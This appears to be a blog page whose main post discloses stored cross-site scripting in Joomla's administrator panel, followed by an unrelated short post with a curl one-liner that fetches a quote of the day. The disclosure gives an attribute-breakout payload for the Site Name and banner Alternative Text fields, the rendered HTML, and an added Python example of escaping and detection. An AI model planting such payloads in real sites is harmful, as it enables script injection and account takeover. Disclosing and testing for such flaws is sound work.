Sent a report to the Joomla! Strike Team but have never received a response.
Seems like the vuln is not critical.
To trigger these XSS vulns you will need access to the administrative panel. Since the vulns are basically the same but are in different parameters, I’ll be showing an example of just one.
1) Go to the Global Configuration page:
2) Type in the following payload in “Site Name”
" onclick=alert(1) test="
<header class="header">
  <div class="container-logo">
    <img src="/joomla/administrator/templates/isis/images/logo.png" class="logo" alt="" onclick="alert(1)" test="">
    <span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span>
  </div>

<a class="brand pull-left" href="/joomla">
  <span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span>
</a>
<div class="header-search pull-right">
There are many other parameters in the admin panel that are vulnerable. Another example would be the “Banner” page. Entering the exact same payload as the one above in the “Alternative Text” input box will also trigger JS when the banner is clicked. Web admins that allow staff to edit banners should be aware of this vuln, as this could lead to an account takeover or something more serious.
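The attribute breakout shown above, as an added Python example (not Joomla's code and not part of the original post): a constructed template modelled on the site-title span is rendered with and without HTML encoding, then parsed to list any attributes the template never declared. The template string, function names and allow-list are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Payload from the post, as typed into "Site Name"
PAYLOAD = '" onclick=alert(1) test="'

# Constructed template modelled on the <span class="site-title"> markup above
TEMPLATE = '<span class="site-title" title="{v}">{v}</span>'


def render_unescaped(value):
    """The 'before': the value is placed into the attribute as-is."""
    return TEMPLATE.format(v=value)


def render_escaped(value):
    """The 'after': &, <, >, double and single quotes are HTML-encoded on output."""
    return TEMPLATE.format(v=escape(value, quote=True))


class AttrCollector(HTMLParser):
    """Records the attributes an HTML parser sees on each <span> start tag."""

    def __init__(self):
        super().__init__()
        self.spans = []

    def handle_starttag(self, tag, attrs):
        if tag == "span":
            self.spans.append(dict(attrs))


def span_attributes(markup):
    """Return the parsed attributes of the first <span> in the markup."""
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.spans[0]


def injected_attributes(markup, allowed=("class", "title")):
    """Attribute names on the span that the template never declared."""
    return sorted(set(span_attributes(markup)) - set(allowed))


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        out = render(PAYLOAD)
        print(name, injected_attributes(out), repr(span_attributes(out)["title"]))
```

The same parsed-attribute comparison can serve as a regression test for any field that is echoed into an attribute, such as the banner “Alternative Text”.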
I was messing around with GeekTool on Mac OS X and decided to write some bash commands to grab the quote of the day from brainyquote.com. I did a Google search afterwards; sadly, someone had already done it. Well, here’s mine, grabbing from quotebr.js instead of the actual HTML.
curl -s www.brainyquote.com/link/quotebr.js | sed -n '3p' | sed -e 's/br.writeln("//g' -e 's/<br>");//g'|tr '\n' ' ' && printf " -" &&curl -s www.brainyquote.com/link/quotebr.js | sed -n '4p' | grep -o "\\\">.*" | sed -e 's/">//g' -e 's/<\/a>");//g'
Here’s the link to the other one: